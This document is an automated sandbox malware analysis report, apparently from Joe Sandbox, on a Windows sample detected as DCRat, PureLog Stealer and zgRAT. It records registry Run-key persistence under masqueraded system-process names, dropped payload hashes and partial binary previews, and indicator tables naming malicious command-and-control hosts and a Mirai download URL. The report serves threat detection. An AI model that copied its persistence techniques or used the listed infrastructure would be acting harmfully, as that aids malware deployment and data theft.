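The path is matched exactly: the sandbox observed one subdomain and one URI, and widening either (for example to every host under n9shka.top) is a judgement call for the analyst, not something this report establishes. The partial string http://664930cm.n9P in the memory table is a truncated extraction artefact and is not used as an indicator.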
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1523119
                                      Start date and time:2024-10-01 05:56:06 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 10m 36s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:36
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:Zn0uX5K1ez.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:58509394a423edb98b0b1be7f18551ab.exe
                                      Detection:MAL
                                      Classification:mal100.spre.troj.spyw.expl.evad.winEXE@44/294@1/1
                                      EGA Information:
                                      • Successful, ratio: 21.4%
                                      HCA Information:Failed
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target Zn0uX5K1ez.exe, PID 5492 because it is empty
                                      • Execution Graph export aborted for target conhost.exe, PID 2096 because it is empty
                                      • Execution Graph export aborted for target conhost.exe, PID 3212 because it is empty
• Execution Graph export aborted for target explorer.exe, PID 3460 because there are no executed functions
                                      • Execution Graph export aborted for target explorer.exe, PID 6076 because it is empty
                                      • Execution Graph export aborted for target explorer.exe, PID 7148 because it is empty
                                      • Execution Graph export aborted for target hPeZTHbzcsUskSflSyozwAqUA.exe, PID 3352 because it is empty
                                      • Execution Graph export aborted for target hPeZTHbzcsUskSflSyozwAqUA.exe, PID 6488 because it is empty
                                      • Execution Graph export aborted for target lsass.exe, PID 5972 because it is empty
                                      • Execution Graph export aborted for target lsass.exe, PID 6924 because it is empty
                                      • Execution Graph export aborted for target msinto.exe, PID 6244 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtCreateFile calls found.
                                      • Report size getting too big, too many NtOpenFile calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
05:57:22 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run hPeZTHbzcsUskSflSyozwAqUA "C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe"
05:57:31 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run lsass "C:\Recovery\lsass.exe"
05:57:44 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\conhost.exe"
05:57:53 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run explorer "C:\Windows\debug\explorer.exe"
05:58:01 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run backgroundTaskHost "C:\Windows\Globalization\Time Zone\backgroundTaskHost.exe"
05:58:09 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run msinto "C:\blockhostnet\msinto.exe"
05:58:18 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run hPeZTHbzcsUskSflSyozwAqUA "C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe"
05:58:26 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run lsass "C:\Recovery\lsass.exe"
05:58:34 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\conhost.exe"
05:58:42 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run explorer "C:\Windows\debug\explorer.exe"
05:58:50 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run backgroundTaskHost "C:\Windows\Globalization\Time Zone\backgroundTaskHost.exe"
05:58:58 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run msinto "C:\blockhostnet\msinto.exe"
05:59:06 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run hPeZTHbzcsUskSflSyozwAqUA "C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe"
05:59:15 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run lsass "C:\Recovery\lsass.exe"
05:59:23 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\conhost.exe"
23:57:30 | API Interceptor | 180753x Sleep call for process: conhost.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37.44.238.250 | VUZeEe6Nhz.exe | malicious | DCRat, PureLog Stealer, zgRAT | 779601cm.newnyash.top/ExternaleternalApiDefaultWindowsUniversaldownloads.php
37.44.238.250 | 4LU843t3Vt.exe | malicious | DCRat, PureLog Stealer, zgRAT | zelensky.top/RequestlongpolllinuxTrafficlocalpublicUploads.php
37.44.238.250 | yQrCGtNgsf.exe | malicious | DCRat, PureLog Stealer, zgRAT | 115583cm.n9shteam2.top/vmTo_authDbbaseTesttrackDatalifedownloads.php
37.44.238.250 | qDlkXj5kcZ.exe | malicious | DCRat, PureLog Stealer, zgRAT | 918938cm.n9shteam2.top/JspacketWindows.php
37.44.238.250 | C0laqZmkEf.exe | malicious | DCRat | 288583cm.n9shteam2.top/tohttppacketcpuBigloadProtectdbgeneratorlocal.php
37.44.238.250 | VL1xZpPp1I.exe | malicious | DCRat, PureLog Stealer, zgRAT | seroi.top/imageSecurelowlongpollapisqllocal.php
37.44.238.250 | qM9xet97tX.exe | malicious | DCRat, PureLog Stealer, zgRAT | 272450cm.n9shteam2.top/eternalasync.php
37.44.238.250 | o2ymBtmuuW.exe | malicious | DCRat | seroi.top/imageSecurelowlongpollapisqllocal.php
                                      No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
HARMONYHOSTING-ASFR | VUZeEe6Nhz.exe | malicious | DCRat, PureLog Stealer, zgRAT | 37.44.238.250
HARMONYHOSTING-ASFR | 4LU843t3Vt.exe | malicious | DCRat, PureLog Stealer, zgRAT | 37.44.238.250
HARMONYHOSTING-ASFR | yQrCGtNgsf.exe | malicious | DCRat, PureLog Stealer, zgRAT | 37.44.238.250
HARMONYHOSTING-ASFR | qDlkXj5kcZ.exe | malicious | DCRat, PureLog Stealer, zgRAT | 37.44.238.250
HARMONYHOSTING-ASFR | C0laqZmkEf.exe | malicious | DCRat | 37.44.238.250
HARMONYHOSTING-ASFR | VL1xZpPp1I.exe | malicious | DCRat, PureLog Stealer, zgRAT | 37.44.238.250
HARMONYHOSTING-ASFR | qM9xet97tX.exe | malicious | DCRat, PureLog Stealer, zgRAT | 37.44.238.250
HARMONYHOSTING-ASFR | o2ymBtmuuW.exe | malicious | DCRat | 37.44.238.250
HARMONYHOSTING-ASFR | http://37.44.238.67/bins.sh | malicious | Mirai | 37.44.238.67
                                      No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\Desktop\AEdPygqV.log | VUZeEe6Nhz.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\AEdPygqV.log | KYwOaWhyl6.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\AEdPygqV.log | HdXeCzyZD9.exe | malicious | LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT
C:\Users\user\Desktop\AEdPygqV.log | mElivBCOq1.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\AEdPygqV.log | RqZ4ruld94.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\AEdPygqV.log | dvfpH6JJJC.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\AEdPygqV.log | WR5wwWlTVi.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\AEdPygqV.log | NCTSgL4t0B.exe | malicious | LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT
C:\Users\user\Desktop\AEdPygqV.log | TJWbSGBK0I.exe | malicious | DCRat, PureLog Stealer, zgRAT
C:\Users\user\Desktop\AEdPygqV.log | povqqKBcoP.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:ASCII text, with very long lines (672), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):672
                                                          Entropy (8bit):5.896976137945206
                                                          Encrypted:false
                                                          SSDEEP:12:Eip9/uL2awwV8cKFPQtD+5tqC6GAZ4hEWoaU6qUMmgMcASx62qsQRG50aqgFGn:jp9IFVTaPQtmL5oaURuSIMG40qQn
                                                          MD5:FF809737DA1A6A433622FDB4B0012D14
                                                          SHA1:75E6A27D29385B41001B33644D257CFF63C6AFB2
                                                          SHA-256:1947840857313038F6FDD32C30D8B6DD8514426A8644BEB35E8F974BF9ADD399
                                                          SHA-512:9B35535BAF02BF6ABA70F28DAFD728AF8A001FAC9382E0C634DF9322916E68BA7C52454471ECC15463F7C73A1149342C33DF4B3FD386DCF5EE79BFAE27C697E1
                                                          Malicious:false
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1916416
                                                          Entropy (8bit):7.538719704947355
                                                          Encrypted:false
                                                          SSDEEP:24576:PulZDtxsIdGCPzmHkuMk4f4RxoKxLi6TpR2Jcjdsq2Qnkvu0IaVthZbJ8ytHuc8m:GPtx5dxKo+LbxqqfnWucVpbJ8y1G
                                                          MD5:83152560524B250C6C27561117DF37FE
                                                          SHA1:F17613B0D3EC3D46A51DAF0CA011FF7DC8A8D53A
                                                          SHA-256:72BCBCB256F87968AD40AEF6B4DAC464921CE8F66CDC242B65EB6E9F23B3CA80
                                                          SHA-512:7793EB5DCC26A00A0C72A07DD084A99D2B41E87E995A25040DD183BD84E94FCE652EB896F0EAFAA717BD97A67B8D1BB8E7A28B4C7EA4F39C15532881304A218C
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                          • Antivirus: Virustotal, Detection: 56%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................6..........>T... ...`....@.. ....................................@..................................S..K....`.. ............................................................................ ............... ..H............text...D4... ...6.................. ..`.rsrc... ....`.......8..............@....reloc...............<..............@..B................ T......H...........................x..mS.......................................0..........(.... ........8........E....).......9...*...8$...(.... ....~....{....:....& ....8....*(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........6......._.......8....r...ps....z*...... ....~....{....:....& ....8....~....:.... ....~....{....9....& ....8........~....(P...~....(T... ....?.... ........8T...~....(H... .... .... ....s....~....(L....... ........8....
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):1168
                                                          Entropy (8bit):4.448520842480604
                                                          Encrypted:false
                                                          SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                                          MD5:B5189FB271BE514BEC128E0D0809C04E
                                                          SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                                          SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                                          SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                                          Malicious:false
                                                          Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4608
                                                          Entropy (8bit):3.9231632912207477
                                                          Encrypted:false
                                                          SSDEEP:48:6HmxtaxZ8RxeOAkFJOcV4MKe28drFxP2vqBHLuulB+hnqXSfbNtm:XlxvxVx9Lrevk9TkZzNt
                                                          MD5:6D9E08C3A279917AA147B3E56A0F96ED
                                                          SHA1:9E9481717CCFF188D7C2DE114B0FBBDF74A174DB
                                                          SHA-256:06E1BF3BB4E18C70060DC65D3FD94D9EE8DF83DE2C70F4D548043B5128E81072
                                                          SHA-512:64DC047746EF959DD64822B1147064E980D77841951B4153B20D4841B89681A81C57E9DBAFEE71547D2A76320924C1AD4CC736CCAAE7F100A390D05678A47A54
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f.............................'... ...@....@.. ....................................@.................................`'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..8.............................................................(....*.0..!.......r...pr...p.{....(....(....&..&..*....................0..........r...p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID....... ...#Blob...........WU........%3................................................................
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:ASCII text, with very long lines (624), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):624
                                                          Entropy (8bit):5.885518838465588
                                                          Encrypted:false
                                                          SSDEEP:12:kqJmdTU8CnnwE1LiiShdvHSkLsn/pWSmLChIbb7eRxNflt0hzHch:kaRwE1LiiId6kLmESmLChCb63NflMG
                                                          MD5:6A433C0409A853D38DD383A4D37C2992
                                                          SHA1:8BEDCECAD1F251F079E3D5D11AED95A682D4650D
                                                          SHA-256:6D2A50AA8B9061E5CFA5FD20EC9B2F873D88EE9D61E31791A9B2076E69220E3C
                                                          SHA-512:F0C811CC6747380711D1444FB998466A8D74213398811601FBD42175B71FEA9981B1E5D24033C09EFEDA5BBF4650841F2C91B7888F103C7297CF8E9113ED7C7D
                                                          Malicious:false
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1916416
                                                          Entropy (8bit):7.538719704947355
                                                          Encrypted:false
                                                          SSDEEP:24576:PulZDtxsIdGCPzmHkuMk4f4RxoKxLi6TpR2Jcjdsq2Qnkvu0IaVthZbJ8ytHuc8m:GPtx5dxKo+LbxqqfnWucVpbJ8y1G
                                                          MD5:83152560524B250C6C27561117DF37FE
                                                          SHA1:F17613B0D3EC3D46A51DAF0CA011FF7DC8A8D53A
                                                          SHA-256:72BCBCB256F87968AD40AEF6B4DAC464921CE8F66CDC242B65EB6E9F23B3CA80
                                                          SHA-512:7793EB5DCC26A00A0C72A07DD084A99D2B41E87E995A25040DD183BD84E94FCE652EB896F0EAFAA717BD97A67B8D1BB8E7A28B4C7EA4F39C15532881304A218C
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\lsass.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\lsass.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                          • Antivirus: Virustotal, Detection: 56%, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................6..........>T... ...`....@.. ....................................@..................................S..K....`.. ............................................................................ ............... ..H............text...D4... ...6.................. ..`.rsrc... ....`.......8..............@....reloc...............<..............@..B................ T......H...........................x..mS.......................................0..........(.... ........8........E....).......9...*...8$...(.... ....~....{....:....& ....8....*(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........6......._.......8....r...ps....z*...... ....~....{....:....& ....8....~....:.... ....~....{....9....& ....8........~....(P...~....(T... ....?.... ........8T...~....(H... .... .... ....s....~....(L....... ........8....
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:CSV text
                                                          Category:dropped
                                                          Size (bytes):847
                                                          Entropy (8bit):5.354334472896228
                                                          Encrypted:false
                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                          MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                          SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                          SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                          SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                          Process:C:\Windows\debug\explorer.exe
                                                          File Type:Unknown
                                                          Category:dropped
                                                          Size (bytes):847
                                                          Entropy (8bit):5.354334472896228
                                                          Encrypted:false
                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                          MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                          SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                          SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                          SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                          Process:C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe
                                                          File Type:CSV text
                                                          Category:dropped
                                                          Size (bytes):847
                                                          Entropy (8bit):5.354334472896228
                                                          Encrypted:false
                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                          MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                          SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                          SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                          SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                          Process:C:\Recovery\lsass.exe
                                                          File Type:CSV text
                                                          Category:dropped
                                                          Size (bytes):847
                                                          Entropy (8bit):5.354334472896228
                                                          Encrypted:false
                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                          MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                          SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                          SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                          SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                          Process:C:\blockhostnet\msinto.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1396
                                                          Entropy (8bit):5.350961817021757
                                                          Encrypted:false
                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                          MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                          SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                          SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                          SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr
                                                          Process:C:\Users\user\Desktop\Zn0uX5K1ez.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):522
                                                          Entropy (8bit):5.358731107079437
                                                          Encrypted:false
                                                          SSDEEP:12:Q3La/hz92n4M9tDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLU84qpE4KlKDE4KhKiKhk
                                                          MD5:93E4C46884CB6EE7CDCC4AACE78CDFAC
                                                          SHA1:29B12D9409BA9AFE4C949F02F7D232233C0B5228
                                                          SHA-256:2690023A62F22AB7B27B09351205BA31173B50B77ACA89A5759EDF29A1FB17F7
                                                          SHA-512:E9C3E2FCEE4E13F7776665295A4F6085002913E011BEEF32C8E7065140937DDE1963182B547CC75110BF32AE5130A6686D5862076D5FFED9241F183B9217FA4D
                                                          Malicious:true
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
